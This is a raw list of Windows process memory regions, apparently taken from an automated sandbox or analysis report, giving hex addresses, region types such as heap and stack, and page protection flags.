2BD88025000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
276C0C80000
|
heap
|
page read and write
|
||
1C7B754A000
|
heap
|
page read and write
|
||
18B4738F000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
1FAB2F2D000
|
heap
|
page read and write
|
||
24D95D5A000
|
heap
|
page read and write
|
||
18B472B0000
|
heap
|
page read and write
|
||
22048DD7000
|
heap
|
page read and write
|
||
28DDB864000
|
heap
|
page read and write
|
||
1FAB36C0000
|
heap
|
page read and write
|
||
FD2D7CF000
|
stack
|
page read and write
|
||
215ABA27000
|
heap
|
page read and write
|
||
231D72D0000
|
heap
|
page read and write
|
||
AED70FB000
|
stack
|
page read and write
|
||
7BF6C7E000
|
stack
|
page read and write
|
||
142E9F43000
|
heap
|
page read and write
|
||
1C7B7A1A000
|
heap
|
page read and write
|
||
18723E45000
|
heap
|
page read and write
|
||
18B48AD8000
|
heap
|
page read and write
|
||
18B451B9000
|
heap
|
page read and write
|
||
1FAB2F1E000
|
heap
|
page read and write
|
||
1091EBA0000
|
heap
|
page read and write
|
||
7FFDA3727000
|
unkown
|
page execute and read and write
|
||
7FFDA2EA7000
|
unkown
|
page execute and read and write
|
||
1C7B73E3000
|
heap
|
page read and write
|
||
231D6D13000
|
heap
|
page read and write
|
||
18723E3E000
|
heap
|
page read and write
|
||
1C7B92C1000
|
heap
|
page read and write
|
||
231D6DFB000
|
heap
|
page read and write
|
||
2BD88160000
|
heap
|
page read and write
|
||
10E3AB90000
|
heap
|
page read and write
|
||
276C0A30000
|
heap
|
page read and write
|
||
1FAB2EE8000
|
heap
|
page read and write
|
||
F7955DE000
|
stack
|
page read and write
|
||
67282FF000
|
stack
|
page read and write
|
||
142E9ED0000
|
heap
|
page read and write
|
||
23F53760000
|
heap
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
215AD351000
|
heap
|
page read and write
|
||
231D6CB0000
|
heap
|
page read and write
|
||
1FAB2F0B000
|
heap
|
page read and write
|
||
231D6D30000
|
heap
|
page read and write
|
||
18B4734B000
|
heap
|
page read and write
|
||
1838806A000
|
heap
|
page read and write
|
||
7FFDA346D000
|
unkown
|
page execute and read and write
|
||
7FFD9DF61000
|
unkown
|
page execute and read and write
|
||
205C8DC4000
|
heap
|
page read and write
|
||
1C7B74F0000
|
heap
|
page read and write
|
||
7FFDA2E90000
|
unkown
|
page readonly
|
||
18B477AC000
|
heap
|
page read and write
|
||
24C59EF0000
|
heap
|
page read and write
|
||
7FFD9DF89000
|
unkown
|
page execute and read and write
|
||
18387D90000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
260C1130000
|
heap
|
page execute and read and write
|
||
142E9F43000
|
heap
|
page read and write
|
||
18B490A7000
|
heap
|
page read and write
|
||
18B4A3E6000
|
heap
|
page read and write
|
||
BC084FF000
|
stack
|
page read and write
|
||
18387E67000
|
heap
|
page read and write
|
||
18B476B4000
|
heap
|
page read and write
|
||
18B47383000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
215AB6A4000
|
heap
|
page read and write
|
||
7FFD33112000
|
trusted library allocation
|
page read and write
|
||
15ABB9E0000
|
heap
|
page read and write
|
||
18722443000
|
heap
|
page read and write
|
||
7FFD332D0000
|
trusted library allocation
|
page read and write
|
||
1651FFBD000
|
heap
|
page read and write
|
||
18B47933000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
7FFD9E855000
|
unkown
|
page execute and read and write
|
||
18B47625000
|
heap
|
page read and write
|
||
231D72D4000
|
heap
|
page read and write
|
||
18B479B6000
|
heap
|
page read and write
|
||
205C8BF7000
|
heap
|
page read and write
|
||
64B1F6D000
|
stack
|
page read and write
|
||
1872244A000
|
heap
|
page read and write
|
||
2BE10A52000
|
heap
|
page read and write
|
||
18B49275000
|
heap
|
page read and write
|
||
F7954DD000
|
stack
|
page read and write
|
||
231D6D16000
|
heap
|
page read and write
|
||
1C7B7A23000
|
heap
|
page read and write
|
||
21AB6A50000
|
heap
|
page read and write
|
||
18B48A52000
|
heap
|
page read and write
|
||
1F789260000
|
heap
|
page read and write
|
||
7FFD33100000
|
trusted library allocation
|
page execute and read and write
|
||
142E9F43000
|
heap
|
page read and write
|
||
22125E80000
|
heap
|
page read and write
|
||
B6FABFF000
|
stack
|
page read and write
|
||
18387F7D000
|
heap
|
page read and write
|
||
231D6D17000
|
heap
|
page read and write
|
||
7FFDA370B000
|
unkown
|
page read and write
|
||
18B475C5000
|
heap
|
page read and write
|
||
18B49490000
|
heap
|
page read and write
|
||
1CBB6AED000
|
heap
|
page read and write
|
||
187225C5000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
2909FBCD000
|
heap
|
page read and write
|
||
18387F3A000
|
heap
|
page read and write
|
||
1C7B73F2000
|
heap
|
page read and write
|
||
1C7B742A000
|
heap
|
page read and write
|
||
231D72CC000
|
heap
|
page read and write
|
||
215AB2A0000
|
trusted library allocation
|
page read and write
|
||
7FFDA32F1000
|
unkown
|
page execute and read and write
|
||
7FFD331C0000
|
trusted library allocation
|
page read and write
|
||
231D6D15000
|
heap
|
page read and write
|
||
7FFDA2EA2000
|
unkown
|
page execute and read and write
|
||
1F4C6E11000
|
heap
|
page read and write
|
||
1C7B73FB000
|
heap
|
page read and write
|
||
7FFD9DEE2000
|
unkown
|
page execute and read and write
|
||
215AB331000
|
heap
|
page read and write
|
||
1FAB36D6000
|
heap
|
page read and write
|
||
18B47395000
|
heap
|
page read and write
|
||
133E1180000
|
heap
|
page read and write
|
||
1F789267000
|
heap
|
page read and write
|
||
205C8C2B000
|
heap
|
page read and write
|
||
142E9DB0000
|
heap
|
page read and write
|
||
18387EFD000
|
heap
|
page read and write
|
||
2245C3D0000
|
heap
|
page read and write
|
||
1C7B7540000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
18387F29000
|
heap
|
page read and write
|
||
18B48EE6000
|
heap
|
page read and write
|
||
7FFDA4DA0000
|
unkown
|
page readonly
|
||
260BF214000
|
heap
|
page read and write
|
||
215ABA20000
|
heap
|
page read and write
|
||
2BD86731000
|
heap
|
page read and write
|
||
1C7B92D5000
|
heap
|
page read and write
|
||
231D6D0C000
|
heap
|
page read and write
|
||
1F789267000
|
heap
|
page read and write
|
||
230CA410000
|
heap
|
page read and write
|
||
7FFD9F3C0000
|
unkown
|
page readonly
|
||
1F4C6DD0000
|
heap
|
page read and write
|
||
18B4515B000
|
heap
|
page read and write
|
||
2BD86731000
|
heap
|
page read and write
|
||
218F14E9000
|
heap
|
page read and write
|
||
2245C1A1000
|
heap
|
page read and write
|
||
215AD366000
|
heap
|
page read and write
|
||
5F0467E000
|
stack
|
page read and write
|
||
215AB33A000
|
heap
|
page read and write
|
||
2909FBC7000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
7FFDA3302000
|
unkown
|
page execute and write copy
|
||
1C7B92D5000
|
heap
|
page read and write
|
||
18387EBF000
|
heap
|
page read and write
|
||
1FAB2F27000
|
heap
|
page read and write
|
||
1651FFDC000
|
heap
|
page read and write
|
||
18B48B19000
|
heap
|
page read and write
|
||
18722002000
|
heap
|
page read and write
|
||
18B49CA1000
|
heap
|
page read and write
|
||
231D8BC3000
|
heap
|
page read and write
|
||
260D91D6000
|
heap
|
page read and write
|
||
552FBC7000
|
stack
|
page read and write
|
||
18387EB7000
|
heap
|
page read and write
|
||
18721FF2000
|
heap
|
page read and write
|
||
1651FFED000
|
heap
|
page read and write
|
||
1C7B73EC000
|
heap
|
page read and write
|
||
18721FE4000
|
heap
|
page read and write
|
||
1D25C8A0000
|
heap
|
page read and write
|
||
231D72EB000
|
heap
|
page read and write
|
||
1FAB4F74000
|
heap
|
page read and write
|
||
18B48949000
|
heap
|
page read and write
|
||
2909FBB9000
|
heap
|
page read and write
|
||
7FFD331B0000
|
trusted library allocation
|
page read and write
|
||
2302EF20000
|
heap
|
page read and write
|
||
18B48491000
|
heap
|
page read and write
|
||
18387F2C000
|
heap
|
page read and write
|
||
7FFDA5471000
|
unkown
|
page readonly
|
||
A39227F000
|
stack
|
page read and write
|
||
18B495C9000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
142E9E90000
|
heap
|
page read and write
|
||
7FFD9DF7B000
|
unkown
|
page execute and write copy
|
||
18B48A52000
|
heap
|
page read and write
|
||
18B45156000
|
heap
|
page read and write
|
||
16FD0044000
|
heap
|
page read and write
|
||
18B49C4C000
|
heap
|
page read and write
|
||
1F788EE0000
|
trusted library allocation
|
page read and write
|
||
16FD00E1000
|
heap
|
page read and write
|
||
7FFD94066000
|
unkown
|
page read and write
|
||
24D95D6A000
|
heap
|
page read and write
|
||
1AB93F00000
|
heap
|
page read and write
|
||
7FFDA3FD0000
|
unkown
|
page readonly
|
||
1FAB3144000
|
heap
|
page read and write
|
||
18721FCB000
|
heap
|
page read and write
|
||
18387F5C000
|
heap
|
page read and write
|
||
21AB6990000
|
heap
|
page read and write
|
||
7FFD93BF1000
|
unkown
|
page execute and read and write
|
||
7FFD33140000
|
trusted library allocation
|
page read and write
|
||
18721FFF000
|
heap
|
page read and write
|
||
230F8910000
|
heap
|
page read and write
|
||
18B47BA0000
|
heap
|
page read and write
|
||
18B472F6000
|
heap
|
page read and write
|
||
18B491AF000
|
heap
|
page read and write
|
||
215AB69E000
|
heap
|
page read and write
|
||
7FFD9DFEA000
|
unkown
|
page execute and write copy
|
||
230CA431000
|
heap
|
page read and write
|
||
1FAB2EE7000
|
heap
|
page read and write
|
||
18B48144000
|
direct allocation
|
page read and write
|
||
A39237F000
|
stack
|
page read and write
|
||
231D6D0F000
|
heap
|
page read and write
|
||
18B49569000
|
heap
|
page read and write
|
||
218F1300000
|
heap
|
page read and write
|
||
18B473A7000
|
heap
|
page read and write
|
||
18B49A17000
|
heap
|
page read and write
|
||
1F789657000
|
heap
|
page read and write
|
||
1FF04184000
|
heap
|
page read and write
|
||
7FFDA3FDC000
|
unkown
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
2909FBF3000
|
heap
|
page read and write
|
||
18B49A33000
|
heap
|
page read and write
|
||
18B4859D000
|
heap
|
page read and write
|
||
7FFD944DE000
|
unkown
|
page execute and read and write
|
||
520CADC000
|
stack
|
page read and write
|
||
231D8BC4000
|
heap
|
page read and write
|
||
7FFDA4331000
|
unkown
|
page execute and read and write
|
||
18B4933B000
|
heap
|
page read and write
|
||
1FAB2EEB000
|
heap
|
page read and write
|
||
7FFDA36FB000
|
unkown
|
page execute and read and write
|
||
1F789668000
|
heap
|
page read and write
|
||
231D6D1D000
|
heap
|
page read and write
|
||
18722011000
|
heap
|
page read and write
|
||
22048C20000
|
heap
|
page read and write
|
||
18389D90000
|
heap
|
page read and write
|
||
17B1B0F0000
|
heap
|
page read and write
|
||
1F788EE0000
|
trusted library allocation
|
page read and write
|
||
18B4779C000
|
heap
|
page read and write
|
||
262074C1000
|
heap
|
page read and write
|
||
260BF291000
|
heap
|
page read and write
|
||
2302ECE0000
|
heap
|
page read and write
|
||
7BF6BFF000
|
stack
|
page read and write
|
||
7FFDA3AE1000
|
unkown
|
page execute and read and write
|
||
7FFD94037000
|
unkown
|
page execute and read and write
|
||
7FFD9DED8000
|
unkown
|
page execute and read and write
|
||
2245C3C4000
|
heap
|
page read and write
|
||
205C8C18000
|
heap
|
page read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
2BD87FC0000
|
heap
|
page read and write
|
||
895A54C000
|
stack
|
page read and write
|
||
276C0AAB000
|
heap
|
page read and write
|
||
18387F89000
|
heap
|
page read and write
|
||
1FAB36DF000
|
heap
|
page read and write
|
||
2BD86726000
|
heap
|
page read and write
|
||
1FAB314A000
|
heap
|
page read and write
|
||
231D7152000
|
heap
|
page read and write
|
||
260C2A61000
|
trusted library allocation
|
page read and write
|
||
18B4779C000
|
heap
|
page read and write
|
||
18B47626000
|
heap
|
page read and write
|
||
18B47359000
|
heap
|
page read and write
|
||
276C0A00000
|
heap
|
page read and write
|
||
7FFDA36CC000
|
unkown
|
page execute and write copy
|
||
2F532590000
|
heap
|
page read and write
|
||
7FFDA3731000
|
unkown
|
page execute and write copy
|
||
18721EC0000
|
heap
|
page read and write
|
||
18B4797A000
|
heap
|
page read and write
|
||
1C7B72A0000
|
heap
|
page read and write
|
||
7FF7B2B8B000
|
unkown
|
page readonly
|
||
215AB31A000
|
heap
|
page read and write
|
||
2239CA00000
|
heap
|
page read and write
|
||
18B49777000
|
heap
|
page read and write
|
||
1C7B7A04000
|
heap
|
page read and write
|
||
7FFD9DFA1000
|
unkown
|
page execute and read and write
|
||
18B47A15000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
2BD86731000
|
heap
|
page read and write
|
||
1C7B7A23000
|
heap
|
page read and write
|
||
18389D94000
|
heap
|
page read and write
|
||
7FFD33250000
|
trusted library allocation
|
page read and write
|
||
215AB320000
|
heap
|
page read and write
|
||
17B1B0FA000
|
heap
|
page read and write
|
||
1C7B73E1000
|
heap
|
page read and write
|
||
18B4764B000
|
heap
|
page read and write
|
||
19350A50000
|
heap
|
page read and write
|
||
18B47683000
|
heap
|
page read and write
|
||
215AB352000
|
heap
|
page read and write
|
||
215ABA1F000
|
heap
|
page read and write
|
||
133E14B4000
|
heap
|
page read and write
|
||
18B48BD7000
|
heap
|
page read and write
|
||
231D8BC0000
|
heap
|
page read and write
|
||
18B48992000
|
heap
|
page read and write
|
||
1CBB6AED000
|
heap
|
page read and write
|
||
7FFDA33C0000
|
unkown
|
page readonly
|
||
1838806B000
|
heap
|
page read and write
|
||
1C7B7A07000
|
heap
|
page read and write
|
||
18B49A1E000
|
heap
|
page read and write
|
||
18388065000
|
heap
|
page read and write
|
||
18389DA4000
|
heap
|
page read and write
|
||
1651FFB8000
|
heap
|
page read and write
|
||
4C8D67C000
|
stack
|
page read and write
|
||
18B475C2000
|
heap
|
page read and write
|
||
1F789656000
|
heap
|
page read and write
|
||
4C8D6FF000
|
stack
|
page read and write
|
||
18387ED6000
|
heap
|
page read and write
|
||
18B494D2000
|
heap
|
page read and write
|
||
18B496D1000
|
heap
|
page read and write
|
||
1FAB2F1C000
|
heap
|
page read and write
|
||
7FFDA3709000
|
unkown
|
page execute and write copy
|
||
1C7B73ED000
|
heap
|
page read and write
|
||
7FFD331E0000
|
trusted library allocation
|
page read and write
|
||
187225C7000
|
heap
|
page read and write
|
||
18B4988B000
|
heap
|
page read and write
|
||
18B491F1000
|
heap
|
page read and write
|
||
18B4516E000
|
heap
|
page read and write
|
||
1C7B754A000
|
heap
|
page read and write
|
||
18B472DF000
|
heap
|
page read and write
|
||
18B47BA0000
|
heap
|
page read and write
|
||
2239CB00000
|
heap
|
page read and write
|
||
1FAB323E000
|
heap
|
page read and write
|
||
2BD86800000
|
heap
|
page read and write
|
||
231D72CE000
|
heap
|
page read and write
|
||
7FFDA0861000
|
unkown
|
page execute and read and write
|
||
18722007000
|
heap
|
page read and write
|
||
205C8C06000
|
heap
|
page read and write
|
||
1CCF66B8000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
18B47619000
|
heap
|
page read and write
|
||
FD2C7FE000
|
stack
|
page read and write
|
||
7FFD9F3E1000
|
unkown
|
page read and write
|
||
6217D6000
|
stack
|
page read and write
|
||
18B49A75000
|
heap
|
page read and write
|
||
C85BF7E000
|
stack
|
page read and write
|
||
FD2CC7E000
|
stack
|
page read and write
|
||
1FF03F90000
|
heap
|
page read and write
|
||
18B498ED000
|
heap
|
page read and write
|
||
7FFD9DF8D000
|
unkown
|
page execute and read and write
|
||
276C0AC7000
|
heap
|
page read and write
|
||
18B49CF3000
|
heap
|
page read and write
|
||
1C7B7A0C000
|
heap
|
page read and write
|
||
18B4996E000
|
heap
|
page read and write
|
||
7FFDA5461000
|
unkown
|
page execute read
|
||
2245C370000
|
heap
|
page read and write
|
||
18B4519E000
|
heap
|
page read and write
|
||
2BD86720000
|
heap
|
page read and write
|
||
18B4996E000
|
heap
|
page read and write
|
||
1C7B740A000
|
heap
|
page read and write
|
||
18387F58000
|
heap
|
page read and write
|
||
276C0D74000
|
heap
|
page read and write
|
||
215ABA25000
|
heap
|
page read and write
|
||
205C8C24000
|
heap
|
page read and write
|
||
276C0AB5000
|
heap
|
page read and write
|
||
18388067000
|
heap
|
page read and write
|
||
18387ECF000
|
heap
|
page read and write
|
||
260BF1E0000
|
heap
|
page read and write
|
||
18B47B0B000
|
heap
|
page read and write
|
||
7FFD93CA2000
|
unkown
|
page execute and read and write
|
||
19425180000
|
heap
|
page read and write
|
||
19424FB0000
|
heap
|
page read and write
|
||
215AB69A000
|
heap
|
page read and write
|
||
7FFD9F3DE000
|
unkown
|
page execute and read and write
|
||
28DDB92B000
|
heap
|
page read and write
|
||
1FAB4F64000
|
heap
|
page read and write
|
||
7FFD94064000
|
unkown
|
page execute and write copy
|
||
10E3AAF0000
|
heap
|
page read and write
|
||
7FFDA4DAD000
|
unkown
|
page execute and read and write
|
||
18B4855B000
|
heap
|
page read and write
|
||
18722002000
|
heap
|
page read and write
|
||
18B48A93000
|
heap
|
page read and write
|
||
18B49275000
|
heap
|
page read and write
|
||
18721FD2000
|
heap
|
page read and write
|
||
18B47683000
|
heap
|
page read and write
|
||
1FAB2F15000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
18B472E7000
|
heap
|
page read and write
|
||
18B48519000
|
heap
|
page read and write
|
||
205C8C1E000
|
heap
|
page read and write
|
||
2BE10A44000
|
heap
|
page read and write
|
||
215ABA24000
|
heap
|
page read and write
|
||
18B49524000
|
heap
|
page read and write
|
||
22126130000
|
heap
|
page read and write
|
||
18B4A1C0000
|
heap
|
page read and write
|
||
1FAB2EE9000
|
heap
|
page read and write
|
||
1FAB2F12000
|
heap
|
page read and write
|
||
18722010000
|
heap
|
page read and write
|
||
2EC06FF000
|
stack
|
page read and write
|
||
18387F2C000
|
heap
|
page read and write
|
||
5B3FFF000
|
stack
|
page read and write
|
||
18387F15000
|
heap
|
page read and write
|
||
18389D93000
|
heap
|
page read and write
|
||
18B489E4000
|
heap
|
page read and write
|
||
5F0487E000
|
stack
|
page read and write
|
||
7FFD32FEC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFDA54B1000
|
unkown
|
page execute and read and write
|
||
1C7B73CE000
|
heap
|
page read and write
|
||
1FAB2F0E000
|
heap
|
page read and write
|
||
1F7892FE000
|
heap
|
page read and write
|
||
2B2277AA000
|
heap
|
page read and write
|
||
1C7B79FC000
|
heap
|
page read and write
|
||
16FD00E1000
|
heap
|
page read and write
|
||
18B47BF2000
|
heap
|
page read and write
|
||
18B48C7B000
|
heap
|
page read and write
|
||
242DFBD4000
|
heap
|
page read and write
|
||
18B489E4000
|
heap
|
page read and write
|
||
242DFBD0000
|
heap
|
page read and write
|
||
7FFDA4176000
|
unkown
|
page execute and write copy
|
||
1CBB6AFC000
|
heap
|
page read and write
|
||
18721F50000
|
heap
|
page read and write
|
||
18721FF8000
|
heap
|
page read and write
|
||
18387E97000
|
heap
|
page read and write
|
||
18B47358000
|
heap
|
page read and write
|
||
18B46B20000
|
heap
|
page read and write
|
||
18B48754000
|
heap
|
page read and write
|
||
1FAB2F05000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
7FFD9DFEC000
|
unkown
|
page read and write
|
||
552FF7F000
|
stack
|
page read and write
|
||
16FD0040000
|
heap
|
page read and write
|
||
215AB692000
|
heap
|
page read and write
|
||
19350B30000
|
heap
|
page read and write
|
||
1F78AEE4000
|
heap
|
page read and write
|
||
D3B31BD000
|
stack
|
page read and write
|
||
18B472D4000
|
heap
|
page read and write
|
||
18B472FA000
|
heap
|
page read and write
|
||
18B49B39000
|
heap
|
page read and write
|
||
218F149B000
|
heap
|
page read and write
|
||
18B48629000
|
heap
|
page read and write
|
||
231D6E00000
|
trusted library allocation
|
page read and write
|
||
7FFDA354E000
|
unkown
|
page execute and read and write
|
||
7FFD94397000
|
unkown
|
page execute and read and write
|
||
7FFDA32F0000
|
unkown
|
page readonly
|
||
7FFDA4DA1000
|
unkown
|
page execute and read and write
|
||
2B227750000
|
heap
|
page read and write
|
||
1C7B73D4000
|
heap
|
page read and write
|
||
260C0C34000
|
heap
|
page read and write
|
||
18B4916D000
|
heap
|
page read and write
|
||
7FFDA5477000
|
unkown
|
page readonly
|
||
1651FFED000
|
heap
|
page read and write
|
||
218F14B2000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
2BD8672F000
|
heap
|
page read and write
|
||
260BF24D000
|
heap
|
page read and write
|
||
52AA0FD000
|
stack
|
page read and write
|
||
24373AE0000
|
heap
|
page read and write
|
||
19350B42000
|
heap
|
page read and write
|
||
231D72C8000
|
heap
|
page read and write
|
||
18721FEE000
|
heap
|
page read and write
|
||
8698F7E000
|
stack
|
page read and write
|
||
205C8C2B000
|
heap
|
page read and write
|
||
18B47A65000
|
heap
|
page read and write
|
||
7FF7B2B9E000
|
unkown
|
page read and write
|
||
18387F64000
|
heap
|
page read and write
|
||
1C7B739E000
|
heap
|
page read and write
|
||
242DF760000
|
heap
|
page read and write
|
||
18B45171000
|
heap
|
page read and write
|
||
215AB35D000
|
heap
|
page read and write
|
||
18B47336000
|
heap
|
page read and write
|
||
18721FD2000
|
heap
|
page read and write
|
||
18387F50000
|
heap
|
page read and write
|
||
230F8914000
|
heap
|
page read and write
|
||
2F532594000
|
heap
|
page read and write
|
||
18B4511D000
|
heap
|
page read and write
|
||
1CCF68E4000
|
heap
|
page read and write
|
||
18B4734C000
|
heap
|
page read and write
|
||
231D8BCF000
|
heap
|
page read and write
|
||
255A2930000
|
heap
|
page read and write
|
||
7FFDA3321000
|
unkown
|
page execute and write copy
|
||
18B496D1000
|
heap
|
page read and write
|
||
18B48E90000
|
heap
|
page read and write
|
||
18B4A202000
|
heap
|
page read and write
|
||
18387ECF000
|
heap
|
page read and write
|
||
18721FA7000
|
heap
|
page read and write
|
||
1102BFF000
|
unkown
|
page read and write
|
||
260D1181000
|
trusted library allocation
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
18B4A1B3000
|
heap
|
page read and write
|
||
18B4797A000
|
heap
|
page read and write
|
||
2909FBFC000
|
heap
|
page read and write
|
||
18387EA3000
|
heap
|
page read and write
|
||
7FFDA3320000
|
unkown
|
page execute and read and write
|
||
2BD86730000
|
heap
|
page read and write
|
||
67283FE000
|
stack
|
page read and write
|
||
18387E63000
|
heap
|
page read and write
|
||
1FAB36F9000
|
heap
|
page read and write
|
||
1FAB36D0000
|
heap
|
page read and write
|
||
7FFD93FBB000
|
unkown
|
page execute and read and write
|
||
18722016000
|
heap
|
page read and write
|
||
2BD86724000
|
heap
|
page read and write
|
||
218F1519000
|
heap
|
page read and write
|
||
1FAB3143000
|
heap
|
page read and write
|
||
1FAB3147000
|
heap
|
page read and write
|
||
1F789668000
|
heap
|
page read and write
|
||
FD2C77E000
|
stack
|
page read and write
|
||
18723E37000
|
heap
|
page read and write
|
||
1C1C17E000
|
stack
|
page read and write
|
||
6727FAB000
|
stack
|
page read and write
|
||
18B49CF3000
|
heap
|
page read and write
|
||
7FFDA3304000
|
unkown
|
page read and write
|
||
7FFD32F50000
|
trusted library allocation
|
page read and write
|
||
FD2CDFB000
|
stack
|
page read and write
|
||
142E9F43000
|
heap
|
page read and write
|
||
18B4A202000
|
heap
|
page read and write
|
||
18B45189000
|
heap
|
page read and write
|
||
232DE7A0000
|
heap
|
page read and write
|
||
1FAB4F63000
|
heap
|
page read and write
|
||
2BD86722000
|
heap
|
page read and write
|
||
215AB346000
|
heap
|
page read and write
|
||
215AB6A0000
|
heap
|
page read and write
|
||
1FAB36D7000
|
heap
|
page read and write
|
||
18B45173000
|
heap
|
page read and write
|
||
255A297B000
|
heap
|
page read and write
|
||
231D72F1000
|
heap
|
page read and write
|
||
215ABA19000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
1C7B7A1C000
|
heap
|
page read and write
|
||
1FAB2F0E000
|
heap
|
page read and write
|
||
18B47ABC000
|
heap
|
page read and write
|
||
18B48BA7000
|
heap
|
page read and write
|
||
16FD00CA000
|
heap
|
page read and write
|
||
7FFDA0873000
|
unkown
|
page execute and write copy
|
||
232DE780000
|
heap
|
page read and write
|
||
231D72E8000
|
heap
|
page read and write
|
||
A13217E000
|
stack
|
page read and write
|
||
1F78AEED000
|
heap
|
page read and write
|
||
1F788F57000
|
heap
|
page read and write
|
||
18721F9F000
|
heap
|
page read and write
|
||
215AB697000
|
heap
|
page read and write
|
||
2797DB65000
|
heap
|
page read and write
|
||
33459CF000
|
stack
|
page read and write
|
||
1C7B7542000
|
heap
|
page read and write
|
||
231D6CB9000
|
heap
|
page read and write
|
||
2909FBA0000
|
heap
|
page read and write
|
||
187225AA000
|
heap
|
page read and write
|
||
1091EB9F000
|
heap
|
page read and write
|
||
18722445000
|
heap
|
page read and write
|
||
1C7B9420000
|
heap
|
page read and write
|
||
18B49B7C000
|
heap
|
page read and write
|
||
1872200B000
|
heap
|
page read and write
|
||
7FFDA3311000
|
unkown
|
page execute and read and write
|
||
7FFD93BE8000
|
unkown
|
page execute and read and write
|
||
18B48950000
|
heap
|
page read and write
|
||
24C59EF4000
|
heap
|
page read and write
|
||
1FAB36C8000
|
heap
|
page read and write
|
||
18B48A10000
|
heap
|
page read and write
|
||
2BE10A52000
|
heap
|
page read and write
|
||
7FFD33210000
|
trusted library allocation
|
page read and write
|
||
18B4519B000
|
heap
|
page read and write
|
||
230F87F0000
|
heap
|
page read and write
|
||
18387F83000
|
heap
|
page read and write
|
||
18B48BD7000
|
heap
|
page read and write
|
||
1651FFED000
|
heap
|
page read and write
|
||
187225AE000
|
heap
|
page read and write
|
||
1C7B73D3000
|
heap
|
page read and write
|
||
18B472F7000
|
heap
|
page read and write
|
||
1FAB4F76000
|
heap
|
page read and write
|
||
7FFD9F3DF000
|
unkown
|
page execute and write copy
|
||
7FFD33150000
|
trusted library allocation
|
page read and write
|
||
1C7B73FB000
|
heap
|
page read and write
|
||
7FF7B2B60000
|
unkown
|
page readonly
|
||
7FFDA549A000
|
unkown
|
page execute and write copy
|
||
18B48B64000
|
heap
|
page read and write
|
||
1CCF65D0000
|
heap
|
page read and write
|
||
18B48BA7000
|
heap
|
page read and write
|
||
7FF7B2B61000
|
unkown
|
page execute read
|
||
7FFD33130000
|
trusted library allocation
|
page read and write
|
||
18B47620000
|
heap
|
page read and write
|
||
7FFDA2EA8000
|
unkown
|
page execute and write copy
|
||
18B494D2000
|
heap
|
page read and write
|
||
7FF7B2BA4000
|
unkown
|
page readonly
|
||
2BD86730000
|
heap
|
page read and write
|
||
222B27E000
|
stack
|
page read and write
|
||
18B47342000
|
heap
|
page read and write
|
||
243739EA000
|
heap
|
page read and write
|
||
1651FFC8000
|
heap
|
page read and write
|
||
1FAB36DF000
|
heap
|
page read and write
|
||
F9F7B5E000
|
stack
|
page read and write
|
||
18B47958000
|
heap
|
page read and write
|
||
1C7B73E8000
|
heap
|
page read and write
|
||
187225A8000
|
heap
|
page read and write
|
||
231D6D04000
|
heap
|
page read and write
|
||
1C7B7545000
|
heap
|
page read and write
|
||
362314E000
|
stack
|
page read and write
|
||
7FFD9DF80000
|
unkown
|
page readonly
|
||
1F788F49000
|
heap
|
page read and write
|
||
3C88DEF000
|
stack
|
page read and write
|
||
18B47ADB000
|
heap
|
page read and write
|
||
215AB331000
|
heap
|
page read and write
|
||
1CBB6D20000
|
heap
|
page read and write
|
||
18B47940000
|
heap
|
page read and write
|
||
215AD355000
|
heap
|
page read and write
|
||
28DDB840000
|
heap
|
page read and write
|
||
1F788EE0000
|
trusted library allocation
|
page read and write
|
||
24373A02000
|
heap
|
page read and write
|
||
18B487B8000
|
heap
|
page read and write
|
||
18B49847000
|
heap
|
page read and write
|
||
205C8AF0000
|
heap
|
page read and write
|
||
18387F7B000
|
heap
|
page read and write
|
||
209D9351000
|
heap
|
page read and write
|
||
2797DC00000
|
heap
|
page read and write
|
||
19425184000
|
heap
|
page read and write
|
||
672837E000
|
stack
|
page read and write
|
||
231D7157000
|
heap
|
page read and write
|
||
24D95D71000
|
heap
|
page read and write
|
||
18B47322000
|
heap
|
page read and write
|
||
7FFD9F3DB000
|
unkown
|
page execute and read and write
|
||
18387F57000
|
heap
|
page read and write
|
||
18387EA3000
|
heap
|
page read and write
|
||
2BD86721000
|
heap
|
page read and write
|
||
2B2277C2000
|
heap
|
page read and write
|
||
231D715A000
|
heap
|
page read and write
|
||
E8E7AFF000
|
stack
|
page read and write
|
||
7FFD9DEDD000
|
unkown
|
page execute and read and write
|
||
7FFDA3AFD000
|
unkown
|
page read and write
|
||
260C0B80000
|
trusted library allocation
|
page read and write
|
||
2909FBED000
|
heap
|
page read and write
|
||
1651FDB0000
|
heap
|
page read and write
|
||
1F788FB7000
|
heap
|
page read and write
|
||
1CBB6AD6000
|
heap
|
page read and write
|
||
18B479FF000
|
heap
|
page read and write
|
||
18387EE0000
|
heap
|
page read and write
|
||
1C7B74D0000
|
trusted library allocation
|
page read and write
|
||
18B49275000
|
heap
|
page read and write
|
||
1FAB2EB0000
|
heap
|
page read and write
|
||
215AB9FC000
|
heap
|
page read and write
|
||
18389DA4000
|
heap
|
page read and write
|
||
18387F29000
|
heap
|
page read and write
|
||
18B49849000
|
heap
|
page read and write
|
||
215AD340000
|
heap
|
page read and write
|
||
18B49AB9000
|
heap
|
page read and write
|
||
9AD2CFF000
|
stack
|
page read and write
|
||
18B49690000
|
heap
|
page read and write
|
||
7FFDA36E0000
|
